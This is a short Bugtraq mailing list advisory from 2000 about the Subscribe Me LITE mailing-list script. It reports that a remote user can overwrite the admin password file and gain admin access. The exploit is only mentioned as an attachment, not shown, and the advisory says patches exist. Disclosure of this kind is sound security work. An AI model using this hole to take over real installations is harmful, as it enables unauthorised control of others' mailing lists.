Date: Wed, 23 Aug 2000 19:06:29 -0700
From: n30 <n30@ALLDAS.DE>
Subject: Subscribe Me Vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM

Product: Subscribe Me
Versions: ALL version numbers LITE only
OS: Unix and WinNT
Vendor: Notified, http://www.cgiscriptcenter.com/

The Problem:
Yet again the script allows a remote user to overwrite the Admin Passwd file with any password they see fit, therefore giving them Admin access to the Maillist Script.

Exploit:
See the .zip file attached.

Patches:
Already available, see website; the download version is patched.

n30
n30@alldas.de
www.alldas.de